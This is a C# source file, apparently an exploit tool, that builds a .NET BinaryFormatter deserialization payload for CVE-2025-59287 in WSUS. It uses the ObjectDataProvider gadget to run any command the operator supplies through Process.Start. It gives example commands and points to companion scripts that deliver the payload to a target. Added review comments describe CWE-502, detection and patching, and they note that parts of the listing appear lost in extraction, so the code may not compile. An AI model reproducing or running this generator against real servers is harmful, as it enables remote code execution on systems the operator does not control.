using System;
using System.IO;
using System.Runtime.Serialization.Formatters.Binary;
using System.Windows.Data;
using System.Diagnostics;
using System.Collections.ObjectModel;

namespace WSUSExploit
{
    /// <summary>
    /// Generates malicious BinaryFormatter payloads for CVE-2025-59287.
    /// The program configures an ObjectDataProvider (MethodName "Start", ObjectInstance a new
    /// Process, one ProcessStartInfo parameter built from the first command-line argument),
    /// serializes it with BinaryFormatter, and writes the bytes to a .bin file and a Base64
    /// copy to a .b64 file in the current working directory.
    /// </summary>
    /// <remarks>
    /// Compilation (as given by the author):
    ///   csc /reference:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\WindowsBase.dll" BinaryFormatterPayloadGenerator.cs
    ///
    /// Usage: BinaryFormatterPayloadGenerator.exe followed by one argument, read from args[0].
    /// Example: BinaryFormatterPayloadGenerator.exe calc.exe
    ///
    /// NOTE(review): text appears to have been lost from this listing in extraction (the usage
    /// string ends after ".exe " with no argument placeholder). The code is reproduced as found
    /// and is not known to compile or to serialize successfully, so its output is not evidence
    /// of a host's exposure or patch status.
    ///
    /// Defensive relevance: the weakness class is deserialization of untrusted data (CWE-502).
    /// The receiving-side fix is to keep attacker-reachable bytes away from
    /// BinaryFormatter.Deserialize, together with the vendor update for the CVE named above and
    /// restricting network reachability of the affected service to hosts that need it.
    /// </remarks>
    class BinaryFormatterPayloadGenerator
    {
        /// <summary>
        /// Entry point: prints a banner, validates that one argument was supplied, builds and
        /// serializes the object graph, writes the two output files, and prints their names.
        /// </summary>
        /// <param name="args">Command-line arguments; only args[0] is read.</param>
        static void Main(string[] args)
        {
            // Banner: a line of 61 '=' characters above and below the title.
            Console.WriteLine("=" + new string('=', 60));
            Console.WriteLine("[*] CVE-2025-59287 BinaryFormatter Payload Generator");
            Console.WriteLine("=" + new string('=', 60));

            // No argument supplied: print usage and exit without writing any file.
            if (args.Length < 1)
            {
                Console.WriteLine("\nUsage: BinaryFormatterPayloadGenerator.exe ");
                Console.WriteLine("\nExamples:");
                Console.WriteLine(" BinaryFormatterPayloadGenerator.exe calc.exe");
                Console.WriteLine(" BinaryFormatterPayloadGenerator.exe \"powershell -c whoami\"");
                Console.WriteLine(" BinaryFormatterPayloadGenerator.exe \"cmd /c echo pwned\"");
                return;
            }

            string command = args[0];
            Console.WriteLine($"\n[*] Generating BinaryFormatter payload for command: {command}");

            try
            {
                // Create ObjectDataProvider gadget.
                // This is a known .NET deserialization gadget that can execute arbitrary methods:
                // it is set up here to call the method named "Start" on a Process instance.
                ObjectDataProvider objectDataProvider = new ObjectDataProvider();
                objectDataProvider.MethodName = "Start";
                objectDataProvider.ObjectInstance = new Process();

                // Parse command into ProcessStartInfo.
                ProcessStartInfo processStartInfo = new ProcessStartInfo();

                // Handle commands with arguments: split at spaces into at most two parts, dropping
                // empty entries; the first part becomes FileName and the remainder, if present,
                // becomes Arguments.
                if (command.Contains(" "))
                {
                    string[] parts = command.Split(new char[] { ' ' }, 2, StringSplitOptions.RemoveEmptyEntries);
                    processStartInfo.FileName = parts[0];
                    if (parts.Length > 1)
                    {
                        processStartInfo.Arguments = parts[1];
                    }
                }
                else
                {
                    processStartInfo.FileName = command;
                }

                // UseShellExecute = false with CreateNoWindow = true means a started process would
                // show no window. For detection, the practical signal is therefore
                // process-creation telemetry: an unexpected child of whichever process performed
                // the deserialization (parent/child lineage), not anything visible on the desktop.
                processStartInfo.UseShellExecute = false;
                processStartInfo.CreateNoWindow = true;

                // Method parameters for Process.Start(ProcessStartInfo).
                // NOTE(review): reproduced exactly as it appears in the listing; see the remarks
                // on the class about text lost in extraction.
                Collection methodParameters = new Collection();
                methodParameters.Add(processStartInfo);
                objectDataProvider.MethodParameters = methodParameters;

                // Serialize using BinaryFormatter.
                // BinaryFormatter is obsolete and unsafe for untrusted input; any service that
                // deserializes externally supplied bytes with it should be treated as exposed to
                // this class of object graph.
                BinaryFormatter formatter = new BinaryFormatter();
                using (MemoryStream ms = new MemoryStream())
                {
                    formatter.Serialize(ms, objectDataProvider);
                    byte[] payload = ms.ToArray();

                    // Generate filenames from the local clock (DateTime.Now), second resolution.
                    // The resulting names, payload_<yyyyMMddHHmmss>.bin and .b64, are relative
                    // paths, so both files land in the current working directory; the name
                    // pattern is a usable artifact for forensic triage.
                    string timestamp = DateTime.Now.ToString("yyyyMMddHHmmss");
                    string filename = $"payload_{timestamp}.bin";
                    string base64File = $"payload_{timestamp}.b64";

                    // Save binary payload.
                    File.WriteAllBytes(filename, payload);

                    // Save base64 encoded version (easier to transfer).
                    string base64Payload = Convert.ToBase64String(payload);
                    File.WriteAllText(base64File, base64Payload);

                    Console.WriteLine("\n[+] Payload generated successfully!");
                    Console.WriteLine($" Binary file: {filename}");
                    Console.WriteLine($" Base64 file: {base64File}");
                    Console.WriteLine($" Size: {payload.Length} bytes");

                    // The two scripts named below are not part of this listing.
                    Console.WriteLine("\n[*] Next steps:");
                    Console.WriteLine($" 1. Encrypt the payload: python encrypt_payload.py {filename}");
                    Console.WriteLine($" 2. Or use directly: python wsus_exploit.py -t -f {filename}");
                }
            }
            catch (Exception ex)
            {
                // Any failure in the try block (object setup, serialization, file writes) ends
                // here: the message and stack trace are printed and the program returns normally.
                Console.WriteLine($"\n[!] Error generating payload: {ex.Message}");
                Console.WriteLine(ex.StackTrace);

                // A FileNotFoundException additionally prints the author's compile hint.
                if (ex is FileNotFoundException)
                {
                    Console.WriteLine("\n[*] Make sure WindowsBase.dll is referenced during compilation");
                    Console.WriteLine("[*] Use: csc /reference:\"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\WindowsBase.dll\" BinaryFormatterPayloadGenerator.cs");
                }
            }
        }
    }
}